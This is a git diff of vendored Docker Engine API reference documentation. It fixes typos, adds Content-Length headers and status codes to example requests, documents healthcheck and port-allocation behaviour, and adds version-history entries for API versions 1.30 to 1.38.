                  "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
                  "Command": "echo 1",
                  "Created": 1367854155,
-                 "State": "Exited",
+                 "State": "exited",
                  "Status": "Exit 0",
                  "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}],
                  "Labels": {
@@ -103,7 +108,7 @@ List containers
                  "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
                  "Command": "echo 222222",
                  "Created": 1367854155,
-                 "State": "Exited",
+                 "State": "exited",
                  "Status": "Exit 0",
                  "Ports": [],
                  "Labels": {},
@@ -139,7 +144,7 @@ List containers
                  "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
                  "Command": "echo 3333333333333333",
                  "Created": 1367854154,
-                 "State": "Exited",
+                 "State": "exited",
                  "Status": "Exit 0",
                  "Ports":[],
                  "Labels": {},
@@ -175,7 +180,7 @@ List containers
                  "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
                  "Command": "echo 444444444444444444444444444444444",
                  "Created": 1367854152,
-                 "State": "Exited",
+                 "State": "exited",
                  "Status": "Exit 0",
                  "Ports": [],
                  "Labels": {},
@@ -244,6 +249,7 @@ Create a container
 
     POST /v1.23/containers/create HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
            "Hostname": "",
@@ -382,7 +388,7 @@ Create a container
            + `host-src:container-dest` to bind-mount a host path into the
              container. Both `host-src`, and `container-dest` must be an
              _absolute_ path.
-           + `host-src:container-dest:ro` to make the bind-mount read-only
+           + `host-src:container-dest:ro` to make the bind mount read-only
              inside the container. Both `host-src`, and `container-dest` must be
              an _absolute_ path.
            + `volume-name:container-dest` to bind-mount a volume managed by a
@@ -413,7 +419,7 @@ Create a container
         `"BlkioDeviceWriteBps": [{"Path": "/dev/sda", "Rate": "1024"}]"`
     -   **BlkioDeviceReadIOps** - Limit read rate (IO per second) from a device in the form of:	`"BlkioDeviceReadIOps": [{"Path": "device_path", "Rate": rate}]`, for example:
         `"BlkioDeviceReadIOps": [{"Path": "/dev/sda", "Rate": "1000"}]`
-    -   **BlkioDeviceWiiteIOps** - Limit write rate (IO per second) to a device in the form of:	`"BlkioDeviceWriteIOps": [{"Path": "device_path", "Rate": rate}]`, for example:
+    -   **BlkioDeviceWriteIOps** - Limit write rate (IO per second) to a device in the form of:	`"BlkioDeviceWriteIOps": [{"Path": "device_path", "Rate": rate}]`, for example:
         `"BlkioDeviceWriteIOps": [{"Path": "/dev/sda", "Rate": "1000"}]`
     -   **MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100.
     -   **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not.
@@ -426,8 +432,14 @@ Create a container
           should map to. A JSON object in the form
           `{ <port>/<protocol>: [{ "HostPort": "<port>" }] }`
           Take note that `port` is specified as a string and not an integer value.
-    -   **PublishAllPorts** - Allocates a random host port for all of a container's
+    -   **PublishAllPorts** - Allocates an ephemeral host port for all of a container's
           exposed ports. Specified as a boolean value.
+
+          Ports are de-allocated when the container stops and allocated when the container starts.
+          The allocated port might be changed when restarting the container.
+
+          The port is selected from the ephemeral port range that depends on the kernel.
+          For example, on Linux the range is defined by `/proc/sys/net/ipv4/ip_local_port_range`.
     -   **Privileged** - Gives the container full access to the host. Specified as
           a boolean value.
     -   **ReadonlyRootfs** - Mount the container's root filesystem as read only.
@@ -974,7 +986,7 @@ This endpoint returns a live stream of a container's resource usage statistics.
          }
       }
 
-The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field.
+The `precpu_stats` is the cpu statistic of *previous* read, which is used for calculating the cpu usage percent. It is not the exact copy of the `cpu_stats` field.
 
 **Query parameters**:
 
@@ -1128,6 +1140,7 @@ Update configuration of one or more containers.
 
        POST /v1.23/containers/e90e34656806/update HTTP/1.1
        Content-Type: application/json
+       Content-Length: 12345
 
        {
          "BlkioWeight": 300,
@@ -1143,7 +1156,7 @@ Update configuration of one or more containers.
          "RestartPolicy": {
            "MaximumRetryCount": 4,
            "Name": "on-failure"
-         },
+         }
        }
 
 **Example response**:
@@ -1399,6 +1412,8 @@ Remove the container `id` from the filesystem
         associated to the container. Default `false`.
 -   **force** - 1/True/true or 0/False/false, Kill then remove the container.
         Default `false`.
+-   **link** - 1/True/true or 0/False/false, Remove the specified
+        link associated to the container. Default `false`.
 
 **Status codes**:
 
@@ -1420,6 +1435,7 @@ Copy files or folders of container `id`
 
     POST /v1.23/containers/4fa6e0f0c678/copy HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "Resource": "test.txt"
@@ -1662,6 +1678,7 @@ Build an image from a Dockerfile
 **Example request**:
 
     POST /v1.23/build HTTP/1.1
+    Content-Type: application/x-tar
 
     {% raw %}
     {{ TAR STREAM }}
@@ -1730,7 +1747,7 @@ or being killed.
 
 **Request Headers**:
 
--   **Content-type** – Set to `"application/tar"`.
+-   **Content-type** – Set to `"application/x-tar"`.
 -   **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON
         object with the following structure:
 
@@ -2187,6 +2204,7 @@ if available, for accessing the registry without password.
 
     POST /v1.23/auth HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "username": "hannibal",
@@ -2362,6 +2380,7 @@ Create a new image from a container's changes
 
     POST /v1.23/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "Hostname": "",
@@ -2694,6 +2713,7 @@ See the [image tarball format](#image-tarball-format) for more details.
 
     POST /v1.23/images/load
     Content-Type: application/x-tar
+    Content-Length: 12345
 
     Tarball in body
 
@@ -2763,6 +2783,7 @@ Sets up an exec instance in a running container `id`
 
     POST /v1.23/containers/e90e34656806/exec HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
       "AttachStdin": true,
@@ -2819,6 +2840,7 @@ interactive session with the `exec` command.
 
     POST /v1.23/exec/e90e34656806/start HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
      "Detach": false,
@@ -2964,6 +2986,7 @@ Create a volume
 
     POST /v1.23/volumes/create HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
       "Name": "tardis",
@@ -3147,7 +3170,9 @@ Content-Type: application/json
 
 #### Inspect network
 
-`GET /networks/<network-id>`
+`GET /networks/(id or name)`
+
+Return low-level information on the network `id`
 
 **Example request**:
 
@@ -3206,6 +3231,7 @@ Content-Type: application/json
 
 -   **200** - no error
 -   **404** - network not found
+-   **500** - server error
 
 #### Create a network
 
@@ -3218,6 +3244,7 @@ Create a network
 ```
 POST /v1.23/networks/create HTTP/1.1
 Content-Type: application/json
+Content-Length: 12345
 
 {
   "Name":"isolated_nw",
@@ -3278,7 +3305,12 @@ Content-Type: application/json
 **JSON parameters**:
 
 - **Name** - The new network's name. this is a mandatory field
-- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false`
+- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false`.
+    Since Network is primarily keyed based on a random ID and not on the name, 
+    and network name is strictly a user-friendly alias to the network 
+    which is uniquely identified using ID, there is no guaranteed way to check for duplicates. 
+    This parameter CheckDuplicate is there to provide a best effort checking of any networks 
+    which has the same name but it is not guaranteed to catch all name collisions.
 - **Driver** - Name of the network driver plugin to use. Defaults to `bridge` driver
 - **Internal** - Restrict external access to the network
 - **IPAM** - Optional custom IP scheme for the network
@@ -3292,7 +3324,7 @@ Content-Type: application/json
 
 #### Connect a container to a network
 
-`POST /networks/(id)/connect`
+`POST /networks/(id or name)/connect`
 
 Connect a container to a network
 
@@ -3301,6 +3333,7 @@ Connect a container to a network
 ```
 POST /v1.23/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/connect HTTP/1.1
 Content-Type: application/json
+Content-Length: 12345
 
 {
   "Container":"3613f73ba0e4",
@@ -3329,7 +3362,7 @@ Content-Type: application/json
 
 #### Disconnect a container from a network
 
-`POST /networks/(id)/disconnect`
+`POST /networks/(id or name)/disconnect`
 
 Disconnect a container from a network
 
@@ -3338,6 +3371,7 @@ Disconnect a container from a network
 ```
 POST /v1.23/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/disconnect HTTP/1.1
 Content-Type: application/json
+Content-Length: 12345
 
 {
   "Container":"3613f73ba0e4",
@@ -3362,7 +3396,7 @@ Content-Type: application/json
 
 #### Remove a network
 
-`DELETE /networks/(id)`
+`DELETE /networks/(id or name)`
 
 Instruct the driver to remove the network (`id`).
 
@@ -3377,6 +3411,7 @@ Instruct the driver to remove the network (`id`).
 **Status codes**:
 
 -   **204** - no error
+-   **403** - operation not supported for pre-defined networks
 -   **404** - no such network
 -   **500** - server error
 
diff --git a/vendor/github.com/docker/docker/docs/api/v1.24.md b/vendor/github.com/docker/docker/docs/api/v1.24.md
index 0cf4e2afab..e320020ed6 100644
--- a/vendor/github.com/docker/docker/docs/api/v1.24.md
+++ b/vendor/github.com/docker/docker/docs/api/v1.24.md
@@ -7,8 +7,8 @@ redirect_from:
 - /reference/api/docker_remote_api_v1.24/
 ---
 
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
+<!-- This file is maintained within the moby/moby GitHub
+     repository at https://github.com/moby/moby/. Make all
      pull requests against that repo. If you see this file in
      another repository, consider it read-only there, as it will
      periodically be overwritten by the definitive file. Pull
@@ -23,6 +23,13 @@ redirect_from:
  - The API tends to be REST. However, for some complex commands, like `attach`
    or `pull`, the HTTP connection is hijacked to transport `stdout`,
    `stdin` and `stderr`.
+ - A `Content-Length` header should be present in `POST` requests to endpoints
+   that expect a body.
+ - To lock to a specific version of the API, you prefix the URL with the version
+   of the API to use. For example, `/v1.18/info`. If no version is included in
+   the URL, the maximum supported API version is used.
+ - If the API version specified in the URL is not supported by the daemon, a HTTP
+   `400 Bad Request` error message is returned.
 
 ## 2. Errors
 
@@ -61,7 +68,7 @@ List containers
                  "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
                  "Command": "echo 1",
                  "Created": 1367854155,
-                 "State": "Exited",
+                 "State": "exited",
                  "Status": "Exit 0",
                  "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}],
                  "Labels": {
@@ -111,7 +118,7 @@ List containers
                  "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
                  "Command": "echo 222222",
                  "Created": 1367854155,
-                 "State": "Exited",
+                 "State": "exited",
                  "Status": "Exit 0",
                  "Ports": [],
                  "Labels": {},
@@ -147,7 +154,7 @@ List containers
                  "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
                  "Command": "echo 3333333333333333",
                  "Created": 1367854154,
-                 "State": "Exited",
+                 "State": "exited",
                  "Status": "Exit 0",
                  "Ports":[],
                  "Labels": {},
@@ -183,7 +190,7 @@ List containers
                  "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
                  "Command": "echo 444444444444444444444444444444444",
                  "Created": 1367854152,
-                 "State": "Exited",
+                 "State": "exited",
                  "Status": "Exit 0",
                  "Ports": [],
                  "Labels": {},
@@ -253,6 +260,7 @@ Create a container
 
     POST /v1.24/containers/create HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
            "Hostname": "",
@@ -281,6 +289,13 @@ Create a container
            "Volumes": {
              "/volumes/data": {}
            },
+           "Healthcheck":{
+              "Test": ["CMD-SHELL", "curl localhost:3000"],
+              "Interval": 1000000000,
+              "Timeout": 10000000000,
+              "Retries": 10,
+              "StartPeriod": 60000000000
+           },
            "WorkingDir": "",
            "NetworkDisabled": false,
            "MacAddress": "12:34:56:78:9a:bc",
@@ -385,6 +400,16 @@ Create a container
 -   **Image** - A string specifying the image name to use for the container.
 -   **Volumes** - An object mapping mount point paths (strings) inside the
       container to empty objects.
+-   **Healthcheck** - A test to perform to check that the container is healthy.
+    -     **Test** - The test to perform. Possible values are:
+              + `{}` inherit healthcheck from image or parent image
+              + `{"NONE"}` disable healthcheck
+              + `{"CMD", args...}` exec arguments directly
+              + `{"CMD-SHELL", command}` run command with system's default shell
+    -     **Interval** - The time to wait between checks in nanoseconds. It should be 0 or at least 1000000 (1 ms). 0 means inherit.
+    -     **Timeout** - The time to wait before considering the check to have hung. It should be 0 or at least 1000000 (1 ms). 0 means inherit.
+    -     **Retries** - The number of consecutive failures needed to consider a container as unhealthy. 0 means inherit.
+    -     **StartPeriod** - The time to wait for container initialization before starting health-retries countdown in nanoseconds. It should be 0 or at least 1000000 (1 ms). 0 means inherit.
 -   **WorkingDir** - A string specifying the working directory for commands to
       run in.
 -   **NetworkDisabled** - Boolean value, when true disables networking for the
@@ -397,7 +422,7 @@ Create a container
            + `host-src:container-dest` to bind-mount a host path into the
              container. Both `host-src`, and `container-dest` must be an
              _absolute_ path.
-           + `host-src:container-dest:ro` to make the bind-mount read-only
+           + `host-src:container-dest:ro` to make the bind mount read-only
              inside the container. Both `host-src`, and `container-dest` must be
              an _absolute_ path.
            + `volume-name:container-dest` to bind-mount a volume managed by a
@@ -431,7 +456,7 @@ Create a container
         `"BlkioDeviceWriteBps": [{"Path": "/dev/sda", "Rate": "1024"}]"`
     -   **BlkioDeviceReadIOps** - Limit read rate (IO per second) from a device in the form of:	`"BlkioDeviceReadIOps": [{"Path": "device_path", "Rate": rate}]`, for example:
         `"BlkioDeviceReadIOps": [{"Path": "/dev/sda", "Rate": "1000"}]`
-    -   **BlkioDeviceWiiteIOps** - Limit write rate (IO per second) to a device in the form of:	`"BlkioDeviceWriteIOps": [{"Path": "device_path", "Rate": rate}]`, for example:
+    -   **BlkioDeviceWriteIOps** - Limit write rate (IO per second) to a device in the form of:	`"BlkioDeviceWriteIOps": [{"Path": "device_path", "Rate": rate}]`, for example:
         `"BlkioDeviceWriteIOps": [{"Path": "/dev/sda", "Rate": "1000"}]`
     -   **MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100.
     -   **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not.
@@ -444,8 +469,14 @@ Create a container
           should map to. A JSON object in the form
           `{ <port>/<protocol>: [{ "HostPort": "<port>" }] }`
           Take note that `port` is specified as a string and not an integer value.
-    -   **PublishAllPorts** - Allocates a random host port for all of a container's
+    -   **PublishAllPorts** - Allocates an ephemeral host port for all of a container's
           exposed ports. Specified as a boolean value.
+
+          Ports are de-allocated when the container stops and allocated when the container starts.
+          The allocated port might be changed when restarting the container.
+
+          The port is selected from the ephemeral port range that depends on the kernel.
+          For example, on Linux the range is defined by `/proc/sys/net/ipv4/ip_local_port_range`.
     -   **Privileged** - Gives the container full access to the host. Specified as
           a boolean value.
     -   **ReadonlyRootfs** - Mount the container's root filesystem as read only.
@@ -809,7 +840,7 @@ Get `stdout` and `stderr` logs from the container ``id``
 
 **Query parameters**:
 
--   **details** - 1/True/true or 0/False/flase, Show extra details provided to logs. Default `false`.
+-   **details** - 1/True/true or 0/False/false, Show extra details provided to logs. Default `false`.
 -   **follow** – 1/True/true or 0/False/false, return stream. Default `false`.
 -   **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`.
 -   **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`.
@@ -1005,7 +1036,7 @@ This endpoint returns a live stream of a container's resource usage statistics.
          }
       }
 
-The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field.
+The `precpu_stats` is the cpu statistic of *previous* read, which is used for calculating the cpu usage percent. It is not the exact copy of the `cpu_stats` field.
 
 **Query parameters**:
 
@@ -1155,6 +1186,7 @@ Update configuration of one or more containers.
 
        POST /v1.24/containers/e90e34656806/update HTTP/1.1
        Content-Type: application/json
+       Content-Length: 12345
 
        {
          "BlkioWeight": 300,
@@ -1170,7 +1202,7 @@ Update configuration of one or more containers.
          "RestartPolicy": {
            "MaximumRetryCount": 4,
            "Name": "on-failure"
-         },
+         }
        }
 
 **Example response**:
@@ -1426,6 +1458,8 @@ Remove the container `id` from the filesystem
         associated to the container. Default `false`.
 -   **force** - 1/True/true or 0/False/false, Kill then remove the container.
         Default `false`.
+-   **link** - 1/True/true or 0/False/false, Remove the specified
+        link associated to the container. Default `false`.
 
 **Status codes**:
 
@@ -1659,6 +1693,7 @@ Build an image from a Dockerfile
 **Example request**:
 
     POST /v1.24/build HTTP/1.1
+    Content-Type: application/x-tar
 
     {% raw %}
     {{ TAR STREAM }}
@@ -1727,7 +1762,7 @@ or being killed.
 
 **Request Headers**:
 
--   **Content-type** – Set to `"application/tar"`.
+-   **Content-type** – Set to `"application/x-tar"`.
 -   **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON
         object with the following structure:
 
@@ -2188,6 +2223,7 @@ if available, for accessing the registry without password.
 
     POST /v1.24/auth HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "username": "hannibal",
@@ -2367,6 +2403,7 @@ Create a new image from a container's changes
 
     POST /v1.24/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
          "Hostname": "",
@@ -2632,6 +2669,7 @@ Docker daemon report the following event:
 **Status codes**:
 
 -   **200** – no error
+-   **400** - bad parameter
 -   **500** – server error
 
 #### Get a tarball containing all images in a repository
@@ -2704,6 +2742,7 @@ See the [image tarball format](#image-tarball-format) for more details.
 
     POST /v1.24/images/load
     Content-Type: application/x-tar
+    Content-Length: 12345
 
     Tarball in body
 
@@ -2773,6 +2812,7 @@ Sets up an exec instance in a running container `id`
 
     POST /v1.24/containers/e90e34656806/exec HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
       "AttachStdin": true,
@@ -2829,6 +2869,7 @@ interactive session with the `exec` command.
 
     POST /v1.24/exec/e90e34656806/start HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
      "Detach": false,
@@ -2979,6 +3020,7 @@ Create a volume
 
     POST /v1.24/volumes/create HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
       "Name": "tardis",
@@ -3195,7 +3237,9 @@ Content-Type: application/json
 
 #### Inspect network
 
-`GET /networks/<network-id>`
+`GET /networks/(id or name)`
+
+Return low-level information on the network `id`
 
 **Example request**:
 
@@ -3254,6 +3298,7 @@ Content-Type: application/json
 
 -   **200** - no error
 -   **404** - network not found
+-   **500** - server error
 
 #### Create a network
 
@@ -3266,6 +3311,7 @@ Create a network
 ```
 POST /v1.24/networks/create HTTP/1.1
 Content-Type: application/json
+Content-Length: 12345
 
 {
   "Name":"isolated_nw",
@@ -3327,7 +3373,12 @@ Content-Type: application/json
 **JSON parameters**:
 
 - **Name** - The new network's name. this is a mandatory field
-- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false`
+- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false`.
+    Since Network is primarily keyed based on a random ID and not on the name, 
+    and network name is strictly a user-friendly alias to the network 
+    which is uniquely identified using ID, there is no guaranteed way to check for duplicates. 
+    This parameter CheckDuplicate is there to provide a best effort checking of any networks 
+    which has the same name but it is not guaranteed to catch all name collisions.
 - **Driver** - Name of the network driver plugin to use. Defaults to `bridge` driver
 - **Internal** - Restrict external access to the network
 - **IPAM** - Optional custom IP scheme for the network
@@ -3341,7 +3392,7 @@ Content-Type: application/json
 
 #### Connect a container to a network
 
-`POST /networks/(id)/connect`
+`POST /networks/(id or name)/connect`
 
 Connect a container to a network
 
@@ -3350,6 +3401,7 @@ Connect a container to a network
 ```
 POST /v1.24/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/connect HTTP/1.1
 Content-Type: application/json
+Content-Length: 12345
 
 {
   "Container":"3613f73ba0e4",
@@ -3379,7 +3431,7 @@ Content-Type: application/json
 
 #### Disconnect a container from a network
 
-`POST /networks/(id)/disconnect`
+`POST /networks/(id or name)/disconnect`
 
 Disconnect a container from a network
 
@@ -3388,6 +3440,7 @@ Disconnect a container from a network
 ```
 POST /v1.24/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/disconnect HTTP/1.1
 Content-Type: application/json
+Content-Length: 12345
 
 {
   "Container":"3613f73ba0e4",
@@ -3413,7 +3466,7 @@ Content-Type: application/json
 
 #### Remove a network
 
-`DELETE /networks/(id)`
+`DELETE /networks/(id or name)`
 
 Instruct the driver to remove the network (`id`).
 
@@ -3428,6 +3481,7 @@ Instruct the driver to remove the network (`id`).
 **Status codes**:
 
 -   **204** - no error
+-   **403** - operation not supported for pre-defined networks
 -   **404** - no such network
 -   **500** - server error
 
@@ -3784,6 +3838,7 @@ Content-Type: text/plain; charset=utf-8
 **Status codes**:
 
 -   **200** - no error
+-   **404** - plugin not installed
 -   **500** - plugin is already enabled
 
 #### Disable a plugin
@@ -3812,6 +3867,7 @@ Content-Type: text/plain; charset=utf-8
 **Status codes**:
 
 -   **200** - no error
+-   **404** - plugin not installed
 -   **500** - plugin is already disabled
 
 #### Remove a plugin
@@ -4098,6 +4154,7 @@ an empty value or the default cluster-wide value.
 
     POST /v1.24/nodes/24ifsmvkjbyhk/update?version=8 HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
       "Availability": "active",
@@ -4125,8 +4182,8 @@ JSON Parameters:
     - **Name** – User-defined name for the node.
     - **Labels** – A map of labels to associate with the node (e.g.,
       `{"key":"value", "key2":"value2"}`).
-- **Role** - Role of the node (worker/manager).
-- **Availability** - Availability of the node (active/pause/drain).
+- **Role** - Role of the node (worker|manager).
+- **Availability** - Availability of the node (active|pause|drain).
 
 
 **Status codes**:
@@ -4199,6 +4256,7 @@ Initialize a new swarm. The body of the HTTP response includes the node ID.
 
     POST /v1.24/swarm/init HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
       "ListenAddr": "0.0.0.0:2377",
@@ -4345,6 +4403,7 @@ Update a swarm
 **Example request**:
 
     POST /v1.24/swarm/update HTTP/1.1
+    Content-Length: 12345
 
     {
       "Name": "default",
@@ -4544,6 +4603,7 @@ image](#create-an-image) section for more details.
 
     POST /v1.24/services/create HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
       "Name": "web",
@@ -4686,7 +4746,7 @@ image](#create-an-image) section for more details.
       as part of this service.
         - **Condition** – Condition for restart (`none`, `on-failure`, or `any`).
         - **Delay** – Delay between restart attempts.
-        - **Attempts** – Maximum attempts to restart a given container before giving up (default value
+        - **MaxAttempts** – Maximum attempts to restart a given container before giving up (default value
           is 0, which is ignored).
         - **Window** – Windows is the time window used to evaluate the restart policy (default value is
           0, which is unbounded).
@@ -4832,7 +4892,7 @@ Return information on the service `id`.
 
 #### Update a service
 
-`POST /services/(id or name)/update`
+`POST /services/(id)/update`
 
 Update a service. When using this endpoint to create a service using a
 private repository from the registry, the `X-Registry-Auth` header can be used
@@ -4844,6 +4904,7 @@ image](#create-an-image) section for more details.
 
     POST /v1.24/services/1cb4dnqcyx6m66g2t538x3rxha/update?version=23 HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
       "Name": "top",
diff --git a/vendor/github.com/docker/docker/docs/api/version-history.md b/vendor/github.com/docker/docker/docs/api/version-history.md
index 4363cfbd74..749d9788f6 100644
--- a/vendor/github.com/docker/docker/docs/api/version-history.md
+++ b/vendor/github.com/docker/docker/docs/api/version-history.md
@@ -4,8 +4,8 @@ description: "Documentation of changes that have been made to Engine API."
 keywords: "API, Docker, rcli, REST, documentation"
 ---
 
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
+<!-- This file is maintained within the moby/moby GitHub
+     repository at https://github.com/moby/moby/. Make all
      pull requests against that repo. If you see this file in
      another repository, consider it read-only there, as it will
      periodically be overwritten by the definitive file. Pull
@@ -13,6 +13,176 @@ keywords: "API, Docker, rcli, REST, documentation"
      will be rejected.
 -->
 
+## V1.38 API changes
+
+[Docker Engine API v1.38](https://docs.docker.com/engine/api/v1.38/) documentation
+
+
+* `GET /tasks` and `GET /tasks/{id}` now return a `NetworkAttachmentSpec` field,
+  containing the `ContainerID` for non-service containers connected to "attachable"
+  swarm-scoped networks.
+
+## v1.37 API changes
+
+[Docker Engine API v1.37](https://docs.docker.com/engine/api/v1.37/) documentation
+
+* `POST /containers/create` and `POST /services/create` now supports exposing SCTP ports.
+* `POST /configs/create` and `POST /configs/{id}/create` now accept a `Templating` driver.
+* `GET /configs` and `GET /configs/{id}` now return the `Templating` driver of the config.
+* `POST /secrets/create` and `POST /secrets/{id}/create` now accept a `Templating` driver.
+* `GET /secrets` and `GET /secrets/{id}` now return the `Templating` driver of the secret.
+
+## v1.36 API changes
+
+[Docker Engine API v1.36](https://docs.docker.com/engine/api/v1.36/) documentation
+
+* `Get /events` now return `exec_die` event when an exec process terminates.  
+
+
+## v1.35 API changes
+
+[Docker Engine API v1.35](https://docs.docker.com/engine/api/v1.35/) documentation
+
+* `POST /services/create` and `POST /services/(id)/update` now accepts an
+  `Isolation` field on container spec to set the Isolation technology of the
+  containers running the service (`default`, `process`, or `hyperv`). This
+  configuration is only used for Windows containers.
+* `GET /containers/(name)/logs` now supports an additional query parameter: `until`,
+  which returns log lines that occurred before the specified timestamp.
+* `POST /containers/{id}/exec` now accepts a `WorkingDir` property to set the
+  work-dir for the exec process, independent of the container's work-dir.
+* `Get /version` now returns a `Platform.Name` field, which can be used by products
+  using Moby as a foundation to return information about the platform.
+* `Get /version` now returns a `Components` field, which can be used to return
+  information about the components used. Information about the engine itself is
+  now included as a "Component" version, and contains all information from the
+  top-level `Version`, `GitCommit`, `APIVersion`, `MinAPIVersion`, `GoVersion`,
+  `Os`, `Arch`, `BuildTime`, `KernelVersion`, and `Experimental` fields. Going
+  forward, the information from the `Components` section is preferred over their
+  top-level counterparts.
+
+
+## v1.34 API changes
+
+[Docker Engine API v1.34](https://docs.docker.com/engine/api/v1.34/) documentation
+
+* `POST /containers/(name)/wait?condition=removed` now also also returns
+  in case of container removal failure. A pointer to a structure named
+  `Error` added to the response JSON in order to indicate a failure.
+  If `Error` is `null`, container removal has succeeded, otherwise
+  the test of an error message indicating why container removal has failed
+  is available from `Error.Message` field.
+
+## v1.33 API changes
+
+[Docker Engine API v1.33](https://docs.docker.com/engine/api/v1.33/) documentation
+
+* `GET /events` now supports filtering 4 more kinds of events: `config`, `node`,
+`secret` and `service`.
+
+## v1.32 API changes
+
+[Docker Engine API v1.32](https://docs.docker.com/engine/api/v1.32/) documentation
+
+* `POST /containers/create` now accepts additional values for the
+  `HostConfig.IpcMode` property. New values are `private`, `shareable`,
+  and `none`.
+* `DELETE /networks/{id or name}` fixed issue where a `name` equal to another
+  network's name was able to mask that `id`. If both a network with the given
+  _name_ exists, and a network with the given _id_, the network with the given
+  _id_ is now deleted. This change is not versioned, and affects all API versions
+  if the daemon has this patch.
+
+## v1.31 API changes
+
+[Docker Engine API v1.31](https://docs.docker.com/engine/api/v1.31/) documentation
+
+* `DELETE /secrets/(name)` now returns status code 404 instead of 500 when the secret does not exist.
+* `POST /secrets/create` now returns status code 409 instead of 500 when creating an already existing secret.
+* `POST /secrets/create` now accepts a `Driver` struct, allowing the
+  `Name` and driver-specific `Options` to be passed to store a secrets
+  in an external secrets store. The `Driver` property can be omitted
+  if the default (internal) secrets store is used.
+* `GET /secrets/(id)` and `GET /secrets` now return a `Driver` struct,
+  containing the `Name` and driver-specific `Options` of the external
+  secrets store used to store the secret. The `Driver` property is
+  omitted if no external store is used.
+* `POST /secrets/(name)/update` now returns status code 400 instead of 500 when updating a secret's content which is not the labels.
+* `POST /nodes/(name)/update` now returns status code 400 instead of 500 when demoting last node fails.
+* `GET /networks/(id or name)` now takes an optional query parameter `scope` that will filter the network based on the scope (`local`, `swarm`, or `global`).
+* `POST /session` is a new endpoint that can be used for running interactive long-running protocols between client and
+  the daemon. This endpoint is experimental and only available if the daemon is started with experimental features
+  enabled.
+* `GET /images/(name)/get` now includes an `ImageMetadata` field which contains image metadata that is local to the engine and not part of the image config.
+* `POST /services/create` now accepts a `PluginSpec` when `TaskTemplate.Runtime` is set to `plugin`
+* `GET /events` now supports config events `create`, `update` and `remove` that are emitted when users create, update or remove a config
+* `GET /volumes/` and `GET /volumes/{name}` now return a `CreatedAt` field,
+  containing the date/time the volume was created. This field is omitted if the
+  creation date/time for the volume is unknown. For volumes with scope "global",
+  this field represents the creation date/time of the local _instance_ of the
+  volume, which may differ from instances of the same volume on different nodes.
+* `GET /system/df` now returns a `CreatedAt` field for `Volumes`. Refer to the
+  `/volumes/` endpoint for a description of this field.
+
+## v1.30 API changes
+
+[Docker Engine API v1.30](https://docs.docker.com/engine/api/v1.30/) documentation
+
+* `GET /info` now returns the list of supported logging drivers, including plugins.
+* `GET /info` and `GET /swarm` now returns the cluster-wide swarm CA info if the node is in a swarm: the cluster root CA certificate, and the cluster TLS
+ leaf certificate issuer's subject and public key. It also displays the desired CA signing certificate, if any was provided as part of the spec.
+* `POST /build/` now (when not silent) produces an `Aux` message in the JSON output stream with payload `types.BuildResult` for each image produced. The final such message will reference the image resulting from the build.
+* `GET /nodes` and `GET /nodes/{id}` now returns additional information about swarm TLS info if the node is part of a swarm: the trusted root CA, and the
+ issuer's subject and public key.
